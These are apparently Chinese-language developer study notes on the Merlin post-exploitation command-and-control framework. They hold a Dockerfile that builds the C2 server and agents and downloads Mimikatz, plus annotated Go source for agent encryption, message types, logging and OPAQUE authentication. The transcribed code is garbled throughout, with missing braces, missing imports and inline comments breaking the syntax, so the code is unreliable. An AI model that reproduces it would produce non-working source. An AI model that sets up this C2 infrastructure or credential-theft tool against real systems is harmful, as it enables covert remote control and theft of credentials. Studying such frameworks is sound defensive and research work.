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Merlin 远控二次开发



\# Build the Docker image first  
\#  > sudo docker build -t merlin . 创建Merlin项目  
\# To start the Merlin Server, run 在443端口起container,映射日志目录,将c2运行的日志放在merlin-server-log和merlin-agent-logs文件夹中  
\#  > sudo docker run -it -p 443:443 -v ~/merlin-server-log:/opt/merlin/data/log -v ~/merlin-agent-logs:/opt/merlin/data/agents merlin:latest   
\# Update APT 更新apt及cmake需要的apt-transport-https及windows平台c/c++需要的gcc-mingw-w64编译器  
RUN apt-get update  
RUN apt-get upgrade -y  
RUN apt-get install -y apt-transport-https vim gcc-mingw-w64 unzip  
\# Install Microsoft package signing key 注册 Microsoft 密钥和源  
RUN wget --quiet -O - https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.asc.gpg 安装microsoft公共库秘钥  
RUN mv microsoft.asc.gpg /etc/apt/trusted.gpg.d/  
RUN wget --quiet https://packages.microsoft.com/config/debian/10/prod.list  
RUN mv prod.list /etc/apt/sources.list.d/microsoft-prod.list  
RUN chown root:root /etc/apt/trusted.gpg.d/microsoft.asc.gpg  
RUN chown root:root /etc/apt/sources.list.d/microsoft-prod.list  
\# Install Microsoft .NET Core 2.1 SDK 安装 .NET Core SDK  
RUN apt-get update  
RUN apt-get install -y dotnet-sdk-2.1  
\# Clone Merlin Server 下载merlin服务端项目源码  
WORKDIR /opt  
RUN git clone --recurse-submodules https://github.com/Ne0nd0g/merlin  
WORKDIR /opt/merlin  
RUN go mod download  
\# Clone Merlin Agent 下载merlin客户端项目源码  
WORKDIR /opt/  
RUN git clone https://github.com/Ne0nd0g/merlin-agent  
WORKDIR /opt/merlin-agent  
RUN go mod download  
RUN make all  
\# Clone Merlin Agent DLL 下载merlin客户端Dll文件源码  
WORKDIR /opt/  
RUN git clone https://github.com/Ne0nd0g/merlin-agent-dll  
WORKDIR /opt/merlin-agent-dll  
RUN go mod download  
RUN make  
\# Build SharpGen 编译.net 加密项目模块  
WORKDIR /opt/merlin/data/src/cobbr/SharpGen  
RUN dotnet build -c release  
\# Download Mimikatz 下载mimikatz  
WORKDIR /opt/merlin/data/src/  
RUN wget https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz\_trunk.zip  
RUN unzip mimikatz\_trunk.zip -d mimikatz  
RUN rm /opt/merlin/data/src/mimikatz\_trunk.zip  
\# Port that the agent will communicate with the server on  指定于外界交互的443端口  
EXPOSE 443  
WORKDIR /opt/merlin 运行main.go入口文件  
CMD \["go", "run", "main.go"\]


2022/01/05  23:15    <DIR>          ..  
2022/01/05  23:15                56 .gitattributes  
2022/01/05  23:15    <DIR>          .github  
2022/01/05  23:15                51 .gitignore  
2022/01/05  23:15               114 .gitmodules  
2022/01/05  23:15    <DIR>          data   存放项目启动后存放的日志、数据库、agent向server传输的文件及日志、tls证书文件等文件  
2022/01/05  23:15             1,897 Dockerfile  
2022/01/05  23:15    <DIR>          docs   项目各项模块介绍及说明文档  
2022/01/05  23:15             1,225 go.mod  
2022/01/05  23:15            34,280 go.sum  
2022/01/05  23:15            33,071 LICENSE  
2022/01/05  23:15             2,093 main.go 项目入口文件  
2022/01/05  23:15               818 Makefile  
2022/01/05  23:15    <DIR>          pkg     项目核心库文件  
2022/01/05  23:15             6,058 README.MD  
              10 个文件         79,663 字节  
               6 个目录 24,150,183,936 可用字节


2022/01/05  23:15    <DIR>          .  
2022/01/05  23:15    <DIR>          ..  
2022/01/05  23:15    <DIR>          agents  存放agent向server传输的文件及日志  
2022/01/05  23:15    <DIR>          log     存放server端日志文件  
2022/01/05  23:15    <DIR>          modules 存放json格式模块文件(类似插件,包含第三方文件github地址及)  
2022/01/05  23:15               484 README.MD  
2022/01/05  23:15    <DIR>          src     存放第三方工具源码  
2022/01/05  23:15    <DIR>          x509    存放cert证书  
               1 个文件            484 字节  
               7 个目录 24,152,489,984 可用字节


2022/01/05  23:15    <DIR>          ..  
2022/01/05  23:15    <DIR>          agent                        存放客户端rst文档(包含agent端描述文档、dll描述文档、使用make自行编译文档)  
2022/01/05  23:15            30,704 CHANGELOG.MD  
2022/01/05  23:15             5,806 conf.py                      Sphinx配置文件    
2022/01/05  23:15             3,272 CONTRIBUTING.MD  
2022/01/05  23:15    <DIR>          images                       文档中涉及的图片  
2022/01/05  23:15             1,672 index.rst                    描述文件索引  
2022/01/05  23:15               599 ISSUE\_TEMPLATE.md  
2022/01/05  23:15               787 make.bat                     由Sphinx quickstart生成  
2022/01/05  23:15               598 Makefile                     由Sphinx quickstart生成  
2022/01/05  23:15    <DIR>          misc                         杂项文档  
2022/01/05  23:15    <DIR>          modules                      模块描述rst文档(模块是预存的agent将执行的一系列操作的json描述文件)  
2022/01/05  23:15               603 PULL\_REQUEST\_TEMPLATE.md   
2022/01/05  23:15    <DIR>          quickStart                   存放快速使用rst文档(包含客户端使用文档、服务端使用文档、和答疑文档)  
2022/01/05  23:15    <DIR>          server                       存放服务端rst文档(tls证书描述文件、服务端各项目录描述文档【agent、listener、main、modules】)  
2022/01/05  23:15    <DIR>          \_build                       各文档生成过程中的编译文件树文档  
               8 个文件         44,041 字节  
               9 个目录 22,375,784,448 可用字节

Sphinx是一个工具,她能够轻易地创建文档,此处为sphinx-build 脚本构建了一个Sphinx文档集


2022/01/05  23:15    <DIR>          ..  
2022/01/05  23:15    <DIR>          agents  
2022/01/05  23:15    <DIR>          api  
2022/01/05  23:15    <DIR>          cli  
2022/01/05  23:15    <DIR>          core  
2022/01/05  23:15    <DIR>          handlers  
2022/01/05  23:15    <DIR>          jobs  
2022/01/05  23:15    <DIR>          listeners  
2022/01/05  23:15    <DIR>          logging  
2022/01/05  23:15             1,008 merlin.go                 定义了包名、版本、和编译参数为非发布(norealease)  
2022/01/05  23:15    <DIR>          messages  
2022/01/05  23:15    <DIR>          modules  
2022/01/05  23:15    <DIR>          opaque  
2022/01/05  23:15    <DIR>          pwnboard  
2022/01/05  23:15               129 README.MD  
2022/01/05  23:15    <DIR>          server  
2022/01/05  23:15    <DIR>          servers  
2022/01/05  23:15    <DIR>          util  
               2 个文件          1,137 字节  
              17 个目录 22,401,064,960 可用字节



// Merlin is a post-exploitation command and control framework.  
// This file is part of Merlin.  
// Copyright (C) 2021  Russel Van Tuyl  
// Merlin is free software: you can redistribute it and/or modify  
// it under the terms of the GNU General Public License as published by  
// the Free Software Foundation, either version 3 of the License, or  
// any later version.  
// Merlin is distributed in the hope that it will be useful,  
// but WITHOUT ANY WARRANTY; without even the implied warranty of  
// GNU General Public License for more details.  
// You should have received a copy of the GNU General Public License  
// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.  
package merlin             声明了包名  
// Version is a constant variable containing the version number for the Merlin package  
const Version \= "1.2.0"   定义了静态变量版本号  
// Build is the unique number based off the git commit in which it is compiled against  
var Build \= "nonRelease"  声明了编译变量为非发布   




// Merlin is a post-exploitation command and control framework.  
// This file is part of Merlin.  
// Copyright (C) 2021  Russel Van Tuyl  
// Merlin is free software: you can redistribute it and/or modify  
// it under the terms of the GNU General Public License as published by  
// the Free Software Foundation, either version 3 of the License, or  
// any later version.  
// Merlin is distributed in the hope that it will be useful,  
// but WITHOUT ANY WARRANTY; without even the implied warranty of  
// GNU General Public License for more details.  
// You should have received a copy of the GNU General Public License  
// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.  
package core  
import (  
    // Standard     引用的官方库文件  
    // 3rd Party     引用第三方库  
    // Merlin  
    "github.com/Ne0nd0g/merlin/pkg/messages"          //引用本项目messages  
// Debug puts Merlin into debug mode and displays debug messages  
var Debug \= false   //关闭调试模式  
// Verbose puts Merlin into verbose mode and displays verbose messages  
var Verbose \= false  //关闭详细信息输出  
// CurrentDir is the current directory where Merlin was executed from  
var CurrentDir, \_ \= os.Getwd()            //获取当前路径  
var src \= rand.NewSource(time.Now().UnixNano())           //使用当前时间戳作为随机数种子  
// Constants  
const (  
    letterIdxBits \= 6                    // 6 bits to represent a letter index  
    letterIdxMask \= 1<<letterIdxBits \- 1 // All 1-bits, as many as letterIdxBits letteridmask = letterIdxBits右移一位-1即63  
    letterIdxMax  \= 63 / letterIdxBits   // # of letter indices fitting in 63 bits  63/6=10  
    letterBytes   \= "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"  
// RandStringBytesMaskImprSrc generates and returns a  //random string of n characters long   
func RandStringBytesMaskImprSrc(n int) string {        //生成n个字节长度的随机字符  
    // http://stackoverflow.com/questions/22892120/how-to-generate-a-random-string-of-a-fixed-length-in-golang  
    b :\= make(\[\]byte, n)           //b为长度n的byte 数组  
    // A src.Int63() generates 63 random bits, enough for letterIdxMax characters!  
 //src.Int63() 生成 63 个随机位,足以容纳 letterIdxMax 个字符  
 //int64是64位有符号整数类型。这意味着它具有1个符号位和63个有效位。这意味着任何返回非负 int64的东西都会产生63位数据(第64位(符号位)将始终具有相同的值)  
    for i, cache, remain :\= n\-1, src.Int63(), letterIdxMax; i \>= 0; {  //i位n个字符数组下标,cache为随机数,remain=10  
        if remain \== 0 {  
            cache, remain \= src.Int63(), letterIdxMax                 // cache为19位数字   
        if idx :\= int(cache & letterIdxMask); idx < len(letterBytes) {  //按位与生成63以内数字,且数字在随机字符集下标内,为随机字符数组对应下标字符赋值  
            b\[i\] \= letterBytes\[idx\]   
        cache \>>= letterIdxBits                                       //cache = cache>>6 cache向右位移6位,用新的6位随机数去相与,共64位  
        remain\--                                                         //10次用尽生成新的随机数  
    return string(b)  
// DecryptJWE takes provided JWE string and decrypts it using the per-agent key 对jwe秘钥进行解密  
func DecryptJWE(jweString string, key \[\]byte) (messages.Base, error) {  
    var m messages.Base      
/\*    type Base struct {  
    Version float32     \`json:"version"\`  
    ID      uuid.UUID   \`json:"id"\`  
    Type    int         \`json:"type"\`  
    Payload interface{} \`json:"payload,omitempty"\`  
    Padding string      \`json:"padding"\`  
    Token   string      \`json:"token,omitempty"\`  
    message.base struct结构  
    // Parse JWE string back into JSONWebEncryption  
    jwe, errObject :\= jose.ParseEncrypted(jweString)                        //go-jose加密解密包,解析(反序列化?)输入的jwe加密字符串  
    if errObject != nil {  
        return m, fmt.Errorf("there was an error parseing the JWE string into a JSONWebEncryption object:\\r\\n%s", errObject)  
    // Decrypt the JWE  
    jweMessage, errDecrypt :\= jwe.Decrypt(key)                         //对解析过的反序列化对象串根据输入的key进行解密  
    if errDecrypt != nil {  
        return m, fmt.Errorf("there was an error decrypting the JWE string:\\r\\n%s", errDecrypt.Error())  
    // Decode the JWE payload into a messages.Base struct  
    errDecode :\= gob.NewDecoder(bytes.NewReader(jweMessage)).Decode(&m) //解码jweMessage并写入变量m中  
    gob包("encoding/gob")管理gob流——在encoder(编码器,也就是发送器)和decoder(解码器,也就是接受器)之间交换的字节流数据(gob 就是 go binary的缩写)。一般用于传递远端程序调用(RPC)的参数和结果。  
    if errDecode != nil {  
        return m, fmt.Errorf("there was an error decoding JWE payload message sent by an agent:\\r\\n%s", errDecode.Error())  
    return m, nil //返回message.base结构体  
// GetJWESymetric takes an input, typically a gob encoded messages.Base, and returns a compact serialized JWE using the  
// provided input key           jwe对称加密函数  
func GetJWESymetric(data \[\]byte, key \[\]byte) (string, error) {  
    //   Keys used with AES GCM must follow the constraints in Section 8.3 of  
    //   \[NIST.800-38D\], which states: "The total number of invocations of the  
    //   authenticated encryption function shall not exceed 2^32, including  
    //   all IV lengths and all instances of the authenticated encryption  
    //   function with the given key".  In accordance with this rule, AES GCM  
    //   MUST NOT be used with the same key value more than 2^32 times. == 4294967296  
    //   TODO ensure no more than 4294967295 JWE's are created using the same key  
   // 与 AES GCM 一起使用的密钥必须遵循 \[NIST.800-38D\] 的第 8.3 节中的约束,其中指出:“经过身份验证的加密函数的调用总数不得超过 2^32,包括所有 IV 长度和所有 具有给定密钥的经过身份验证的加密函数的实例”。 根据此规则,AES GCM 不得与相同的密钥值一起使用超过 2^32 次。 == 4294967296  
// TODO 确保使用相同的密钥创建不超过 4294967295 个 JWE  
    encrypter, encErr :\= jose.NewEncrypter(jose.A256GCM,  
            Algorithm: jose.PBES2\_HS512\_A256KW, // Creates a per message key encrypted with the passed in key  
            //Algorithm: jose.DIRECT, // Doesn't create a per message key  
            PBES2Count: 500000,  
            Key:        key},  
/\* type Recipient ¶  
type Recipient struct {  
    Algorithm  KeyAlgorithm  
    Key        interface{}  
    KeyID      string  
    PBES2Count int  
    PBES2Salt  \[\]byte  
PBES2Count 和 PBES2Salt 对应于基于密码的加密算法 PBES2-HS256+A128KW、PBES2-HS384+A192KW 和 PBES2-HS512+A256KW 中使用的“p2c”和“p2s”标头。  
如果未提供它们,则将使用安全默认值 100000 进行计数,并将生成 128 位随机盐。  
    if encErr != nil {  
        return "", fmt.Errorf("there was an error creating the JWE encryptor:\\r\\n%s", encErr)  
    jwe, errJWE :\= encrypter.Encrypt(data)  
    if errJWE != nil {  
        return "", fmt.Errorf("there was an error encrypting the Authentication JSON object to a JWE object:\\r\\n%s", errJWE.Error())  
    serialized, errSerialized :\= jwe.CompactSerialize()  
    if errSerialized != nil {  
        return "", fmt.Errorf("there was an error serializing the JWE in compact format:\\r\\n%s", errSerialized.Error())  
    // Parse it to make sure there were no errors serializing it  
    \_, errJWE \= jose.ParseEncrypted(serialized)  
    if errJWE != nil {  
        return "", fmt.Errorf("there was an error parsing the encrypted JWE:\\r\\n%s", errJWE.Error())  
    return serialized, nil  
// GetJWEAsymetric takes an input, typically a gob encoded messages.Base, and returns a compact serialized JWE using the  
// provided input RSA public key             jwe非对称加密函数  
func GetJWEAsymetric(data \[\]byte, key \*rsa.PublicKey) (string, error) {   
    // TODO change key algorithm to ECDH  
    encrypter, encErr :\= jose.NewEncrypter(jose.A256GCM, jose.Recipient{Algorithm: jose.RSA\_OAEP, Key: key}, nil)  
    type Recipient struct {  
    Algorithm  KeyAlgorithm  
    Key        interface{}  
    KeyID      string  
    PBES2Count int  
    PBES2Salt  \[\]byte  
    if encErr != nil {  
        return "", fmt.Errorf("there was an error creating the agent encryptor:\\r\\n%s", encErr)  
    jwe, errJWE :\= encrypter.Encrypt(data)  对数据进行加密生成jwe对象  
    if errJWE != nil {  
        return "", fmt.Errorf("there was an error encrypting the data into a JWE object:\\r\\n%s", errJWE.Error())  
    serialized, errSerialized :\= jwe.CompactSerialize() 对加密后的jwe对象进行序列化  
    if errSerialized != nil {  
        return "", fmt.Errorf("there was an error serializing the JWE in compact format:\\r\\n%s", errSerialized.Error())  
    // Parse it to make sure there were no errors serializing it  
    \_, errJWE \= jose.ParseEncrypted(serialized) 判断是否可以以序列化格式解析加密后的消息  
    if errJWE != nil {  
        return "", fmt.Errorf("there was an error parsing the encrypted JWE:\\r\\n%s", errJWE.Error())  
    return serialized, nil  判断可以解析成功后返回序列化后的jwe加密对象  

JWE header: 描述用于创建jwe加密密钥和jwe密文的加密操作,类似于jws中的header。参数不一一描述,详情请见jwe header参数  
JWE Encrypted Key:用来加密文本内容所采用的算法。  
JWE initialization vector: 加密明文时使用的初始化向量值,有些加密方式需要额外的或者随机的数据。这个参数是可选的。  
JWE Ciphertext:明文加密后产生的密文值。  
JWE Authentication Tag:数字认证标签。  
 //一个完整的jwe json结构 { "protected":"jwe受保护的header头", "unprotected":"JWE Shared Unprotected Header数据", "header":"", "encrypted\_key":"密钥加密后数据 ", "aad":"额外的认证数据", "iv":"同上的 JWE initialization vector", "ciphertext":"同上的JWE Ciphertext", "tag":"同上的JWE Authentication Tag" }  






gob 一般性调用编码解码  
func senMsg()error {  
    enc := gob.NewEncoder(&network)  
    sendMsg:=MsgData{3, 4, 5, "jiangzhou"}  
    err := enc.Encode(&sendMsg)  
    return  err  
func revMsg()error {  
    var revData MsgData  
    err:= dec.Decode(&revData) //传递参数必须为 地址  
    return err  
    enc := gob.NewEncoder(&network)   
    s=append(s, "hello")  
    //sendMsg:=MsgData{3, 4, 5, "jiangzhou",Msg{10001,"hello"}}  
    //sendMsg:=MsgData{3, 4, 5, "jiangzhou",66.66}  
    sendMsg:=MsgData{3, 4, 5, "jiangzhou",s}  
func senMsg()error {  
    enc := gob.NewEncoder(&network)  
    gob.Register(map\[int\]string{}) //TODO:进行了注册  
    sendMsg:=MsgData{3, 4, 5, "jiangzhou",m}  
    err := enc.Encode(&sendMsg)  
    return  err  

// Merlin is a post-exploitation command and control framework.  
// This file is part of Merlin.  
// Copyright (C) 2021  Russel Van Tuyl  
// Merlin is free software: you can redistribute it and/or modify  
// it under the terms of the GNU General Public License as published by  
// the Free Software Foundation, either version 3 of the License, or  
// any later version.  
// Merlin is distributed in the hope that it will be useful,  
// but WITHOUT ANY WARRANTY; without even the implied warranty of  
// GNU General Public License for more details.  
// You should have received a copy of the GNU General Public License  
// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.  
package messages  
import (  
	// Standard  
	"encoding/gob" gob包用于二进制流传递参数(值),常用于远程调用传递值(RPC)  
	// 3rd Party  
// init registers message types with gob that are an interface for Base.Payload  
func init() {  
const (  
	// To Server  
	// CHECKIN is used by the Agent to identify that it is checking in with the server  
	CHECKIN = 1 // StatusCheckIn 被agent用于标识他正在与server进行检入  
	// OPAQUE is used to denote that embedded message contains an opaque structure  
	OPAQUE = 2 用于标识传递的(嵌入的)消息包含不透明的结构体  
	// JOBS is used to denote that the embedded message contains a list of job structures  
	JOBS = 3 用来标识传递的(嵌入的)包含一份job结构的结构体  
	// KEYEXCHANGE is used to denote that embedded message contains a key exchange structure  
	KEYEXCHANGE = 4 用于标识传递的(嵌入的)包含一个交换秘钥的结构体  
	// To Agent  
	// IDLE is used to notify the Agent that server has no tasks and that the Agent should idle  
	IDLE = 10 用于通知agent没有任务,应该空闲  
// Base is the base JSON Object for HTTP POST payloads   
type Base struct {  
	Version float32     \`json:"version"\`  
	ID      uuid.UUID   \`json:"id"\`  
	Type    int         \`json:"type"\`  
	Payload interface{} \`json:"payload,omitempty"\`  
	Padding string      \`json:"padding"\`  
	Token   string      \`json:"token,omitempty"\`  
// KeyExchange is a JSON payload used to exchange public keys for encryption  
type KeyExchange struct {  
	PublicKey rsa.PublicKey \`json:"publickey"\`  
// SysInfo is a JSON payload containing information about the system where the agent is running  
type SysInfo struct {  
	Platform     string   \`json:"platform,omitempty"\`  
	Architecture string   \`json:"architecture,omitempty"\`  
	UserName     string   \`json:"username,omitempty"\`  
	UserGUID     string   \`json:"userguid,omitempty"\`  
	HostName     string   \`json:"hostname,omitempty"\`  
	Process      string   \`json:"process,omitempty"\`  
	Pid          int      \`json:"pid,omitempty"\`  
	Ips          \[\]string \`json:"ips,omitempty"\`  
	Domain       string   \`json:"domain,omitempty"\`  
// AgentInfo is a JSON payload containing information about the agent and its configuration  
type AgentInfo struct {  
	Version       string  \`json:"version,omitempty"\`  
	Build         string  \`json:"build,omitempty"\`  
	WaitTime      string  \`json:"waittime,omitempty"\`  
	PaddingMax    int     \`json:"paddingmax,omitempty"\`  
	MaxRetry      int     \`json:"maxretry,omitempty"\`  
	FailedCheckin int     \`json:"failedcheckin,omitempty"\`  
	Skew          int64   \`json:"skew,omitempty"\`  
	Proto         string  \`json:"proto,omitempty"\`  
	SysInfo       SysInfo \`json:"sysinfo,omitempty"\`  
	KillDate      int64   \`json:"killdate,omitempty"\`  
	JA3           string  \`json:"ja3,omitempty"\`  
// String returns the text representation of a message constant  
func String(messageType int) string {  
	switch messageType {  
		return "KeyExchange"  
	case CHECKIN:  
		return "StatusCheckIn"  
	case JOBS:  
		return "Jobs"  
	case OPAQUE:  
		return "OPAQUE"  
	case IDLE:  
		return "Idle"  
		return fmt.Sprintf("Invalid: %d", messageType)  


// Merlin is a post-exploitation command and control framework.  
// This file is part of Merlin.  
// Copyright (C) 2021  Russel Van Tuyl  
// Merlin is free software: you can redistribute it and/or modify  
// it under the terms of the GNU General Public License as published by  
// the Free Software Foundation, either version 3 of the License, or  
// any later version.  
// Merlin is distributed in the hope that it will be useful,  
// but WITHOUT ANY WARRANTY; without even the implied warranty of  
// GNU General Public License for more details.  
// You should have received a copy of the GNU General Public License  
// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.  
package logging  
import (  
   // Standard  
   // 3rd Party  
   "github.com/fatih/color" 定义输出ascii字体颜色的包  
   // Merlin  
var serverLog \*os.File   
func init() {  
   // Server Logging 检测项目根目录下是否存在/data/log/merlinServerLog.txt,如果没有则报错,紧接着调用os.MkdirAll创建目录并创建日志文件  
   if \_, err := os.Stat(filepath.Join(core.CurrentDir, "data", "log", "merlinServerLog.txt")); os.IsNotExist(err) {  
      errM := os.MkdirAll(filepath.Join(core.CurrentDir, "data", "log"),  )  
      if errM != nil {  
         message("warn", "there was an error creating the log directory")  
      serverLog, errC := os.Create(filepath.Join(core.CurrentDir, "data", "log", "merlinServerLog.txt"))  
      if errC != nil {  
         message("warn", "there was an error creating the merlinServerLog.txt file")  
      // Change the file's permissions 修改日志文件权限为0600 ,owner只有读写权限  
      errChmod := os.Chmod(serverLog.Name(), 0600)  
      if errChmod != nil {  
         message("warn", fmt.Sprintf("there was an error changing the file permissions for the agent log:\\r\\n%s", errChmod.Error()))  
      if core.Debug { 如果是debug模式输入日志  
         message("debug", fmt.Sprintf("Created server log file at: %s\\\\data\\\\log\\\\merlinServerLog.txt", core.CurrentDir))  
   var errLog error  
   serverLog, errLog = os.OpenFile(filepath.Join(core.CurrentDir, "data", "log", "merlinServerLog.txt"), os.O\_APPEND|os.O\_WRONLY, 0600) 打开只写模式打开文件  
   if errLog != nil {  
      message("warn", "there was an error with the Merlin Server log file")  
      message("warn", errLog.Error())  
// Server writes a log entry into the server's log file  
func Server(logMessage string) { 向日志写入时间和传入的日志信息  
   \_, err := serverLog.WriteString(fmt.Sprintf("\[%s\]%s\\r\\n", time.Now().UTC().Format(time.RFC3339), logMessage))  
   if err != nil {  
      message("warn", "there was an error writing to the Merlin Server log file")  
      message("warn", err.Error())  
// Message is used to print a message to the command line  
func message(level string, message string) { 根据传入的level等级向控制台输出不同颜色的调试信息  
   switch level {  
   case "info":  
      color.Cyan("\[i\]" + message)  
   case "note":  
      color.Yellow("\[-\]" + message)  
   case "warn":  
      color.Red("\[!\]" + message)  
   case "debug":  
      color.Red("\[DEBUG\]" + message)  
   case "success":  
      color.Green("\[+\]" + message)  
      color.Red("\[\_-\_\]Invalid message level: " + message)  
// TODO configure all message to be displayed on the CLI to be returned as errors and not written to the CLI here


OPRF代表“遗忘伪随机函数”,这是一种协议,通过该协议,双方可以计算确定性的函数F(key,x),但输出看似随机的值。一方输入值x,另一方输入键,输入x的一方学习结果F(key,x),但不学习键,提供键的一方学不到任何东西。 (您可以在此处深入了解OPRF的数学方法:https://blog.cloudflare.com/privacy-pass-the-math/)  
之后,C将口令随机化得到(r, M), 并将M发送至S。  
首先,C根据明文口令password计算(r, M),需要注意的是这里的(r, M)每次都是不同的。之后,C将M发送至S。  
当然,适用于OPAQUE的“下一步”和传统的流程并不完全相同,CFRG建议了包括3DH和SIGMA-I等在内的一些选项,而根据Tatiana Bradley的研究,TLS也是可用的。  
Gopaque 在 Go 中实现了 OPAQUE 协议  
OPAQUE 注册是从用户向服务器注册的用户开始的 3 条消息过程。用户需要的唯一输入是密码,注册后,服务器有信息来执行身份验证。  
1 - 使用用户 ID 创建一个 NewUserRegister  
2 - 使用密码调用 Init 并将生成的 UserRegisterInit 发送到服务器  
3 - 接收服务器的 ServerRegisterInit  
4 - 使用服务器的 ServerRegisterInit 调用 Complete 并将生成的 UserRegisterComplete 发送到服务器  
1 - 接收用户的 UserRegisterInit  
2 - 使用私钥创建一个 NewServerRegister  
3 - 使用用户的 UserRegisterInit 调用 Init 并将生成的 ServerRegisterInit 发送给用户  
4 - 接收用户的 UserRegisterComplete  
5 - 使用用户的 UserRegisterComplete 调用 Complete 并保存生成的 ServerRegisterComplete  
OPAQUE 身份验证旨在与密钥交换协议结合使用以对用户进行身份验证。Gopaque 支持外部密钥交换协议或嵌入到身份验证过程中的协议。流程的纯 OPAQUE 部分只是一个 2 条消息的过程,但使用密钥交换进行验证通常会添加第三条消息。以下步骤假设密钥交换嵌入在身份验证过程中,而不是在外部。  
1 - 创建一个带有嵌入式密钥交换的 NewUserAuth  
2 - 使用密码调用 Init 并将生成的 UserAuthInit 发送到服务器  
3 - 接收服务器的 ServerAuthComplete  
4 - 使用服务器的 ServerAuthComplete 调用 Complete。生成的 UserAuthFinish 包含用户和服务器密钥信息。如果我们不使用嵌入式密钥交换,这将是最后一步。既然我们是,请获取生成的 UserAuthComplete 并将其发送到服务器。  
1 - 接收用户的 UserAuthInit  
2 - 创建一个带有嵌入式密钥交换的 NewServerAuth  
3 - 使用用户的 UserAuthInit 和持久化的 ServerRegisterComplete 调用 Complete 并将生成的 ServerAuthComplete 发送给用户。如果我们不使用嵌入式密钥交换,这将是最后一步。  
4 - 接收用户的 UserAuthComplete  
5 - 使用用户的 UserAuthComplete 调用 Finish  

// Merlin is a post-exploitation command and control framework.  
// This file is part of Merlin.  
// Copyright (C) 2021  Russel Van Tuyl  
// Merlin is free software: you can redistribute it and/or modify  
// it under the terms of the GNU General Public License as published by  
// the Free Software Foundation, either version 3 of the License, or  
// any later version.  
// Merlin is distributed in the hope that it will be useful,  
// but WITHOUT ANY WARRANTY; without even the implied warranty of  
// GNU General Public License for more details.  
// You should have received a copy of the GNU General Public License  
// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.  
package opaque  
import (  
   // Standard  
   // 3rd Party  
   uuid "github.com/satori/go.uuid"  
   // Internal"  
// init registers message types with gob that are an interface for Base.Payload  
func init() {  
const (  
   // RegInit is used to denote that the embedded payload contains data for the OPAQUE protocol Registration Initialization step  
   RegInit = 1  
   // RegComplete is used to denote that the embedded payload contains data for the OPAQUE protocol Registration Complete step  
   RegComplete = 2  
   // AuthInit is used to denote that the embedded payload contains data for the OPAQUE protocol Authorization Initialization step  
   AuthInit = 3  
   // AuthComplete is used to denote that the embedded payload contains data for the OPAQUE protocol Authorization Complete step  
   AuthComplete = 4  
   // ReRegister is used to instruct the Agent it needs to execute the OPAQUE Registration process with the server  
   ReRegister = 5  
   // ReAuthenticate is used to instruct the Agent it needs to execute the OPAQUE Authentication process with the server  
   ReAuthenticate = 6  
// Opaque is a structure that is embedded into Merlin messages as a payload used to complete OPAQUE registration and authentication  
type Opaque struct {  
   Type    int    // The type of OPAQUE message from the constants  
   Payload \[\]byte // OPAQUE payload data  
// Server is the structure that holds information for the various steps of the OPAQUE protocol as the server  
type Server struct {  
   reg         \*gopaque.ServerRegister  
   regComplete \*gopaque.ServerRegisterComplete  
   auth        \*gopaque.ServerAuth  
   Kex         \*gopaque.KeyExchangeSigma  
// ServerRegisterInit is used to perform the OPAQUE Password Authenticated Key Exchange (PAKE) protocol Registration steps for the server  
func ServerRegisterInit(AgentID uuid.UUID, o Opaque, key kyber.Scalar) (Opaque, \*Server, error) {  
   if core.Debug {  
      message("debug", "Entering into opaque.ServerRegisterInit() function...")  
   server := Server{  
      reg: gopaque.NewServerRegister(gopaque.CryptoDefault, key),  
   var userRegInit gopaque.UserRegisterInit  
   errUserRegInit := userRegInit.FromBytes(gopaque.CryptoDefault, o.Payload)  
   if errUserRegInit != nil {  
      return Opaque{}, &server, fmt.Errorf("there was an error unmarshalling the OPAQUE user register initialization message from bytes:\\r\\n%s", errUserRegInit)  
   if !bytes.Equal(userRegInit.UserID, AgentID.Bytes()) {  
      if core.Verbose {  
         message("note", fmt.Sprintf("OPAQUE UserID: %v", userRegInit.UserID))  
         message("note", fmt.Sprintf("Merlin Message UserID: %v", AgentID.Bytes()))  
      return Opaque{}, &server, fmt.Errorf("the OPAQUE UserID doesn't match the Merlin message ID")  
   serverRegInit := server.reg.Init(&userRegInit)  
   serverRegInitBytes, errServerRegInitBytes := serverRegInit.ToBytes()  
   if errServerRegInitBytes != nil {  
      return Opaque{}, &server, fmt.Errorf("there was an error marshalling the OPAQUE server registration initialization message to bytes:\\r\\n%s", errServerRegInitBytes)  
   returnMessage := Opaque{  
      Type:    RegInit,  
      Payload: serverRegInitBytes,  
   return returnMessage, &server, nil  
// ServerRegisterComplete consumes the User's response and finishes OPAQUE Registration  
func ServerRegisterComplete(AgentID uuid.UUID, o Opaque, server \*Server) (Opaque, error) {  
   if core.Debug {  
      message("debug", "Entering into opaque.ServerRegisterComplete() function...")  
   var userRegComplete gopaque.UserRegisterComplete  
   errUserRegComplete := userRegComplete.FromBytes(gopaque.CryptoDefault, o.Payload)  
   if errUserRegComplete != nil {  
      return Opaque{}, fmt.Errorf("there was an error unmarshalling the OPAQUE user register complete message from bytes:\\r\\n%s", errUserRegComplete.Error())  
   server.regComplete = server.reg.Complete(&userRegComplete)  
   // Check to make sure Merlin  UserID matches OPAQUE UserID  
   if !bytes.Equal(AgentID.Bytes(), server.regComplete.UserID) {  
      return Opaque{}, fmt.Errorf("the OPAQUE UserID: %v doesn't match the Merlin UserID: %v", server.regComplete.UserID, AgentID.Bytes())  
   returnMessage := Opaque{  
      Type: RegComplete,  
   return returnMessage, nil  
// ServerAuthenticateInit is used to authenticate an agent leveraging the OPAQUE Password Authenticated Key Exchange (PAKE) protocol  
func ServerAuthenticateInit(o Opaque, server \*Server) (Opaque, error) {  
   if core.Debug {  
      message("debug", "Entering into opaque.ServerAuthenticateInit() function...")  
   // 1 - Receive the user's UserAuthInit  
   server.Kex = gopaque.NewKeyExchangeSigma(gopaque.CryptoDefault)  
   server.auth = gopaque.NewServerAuth(gopaque.CryptoDefault, server.Kex)  
   var userInit gopaque.UserAuthInit  
   errFromBytes := userInit.FromBytes(gopaque.CryptoDefault, o.Payload)  
   if errFromBytes != nil {  
      return Opaque{}, fmt.Errorf("there was an error unmarshalling the user init message from bytes:\\r\\n%s", errFromBytes)  
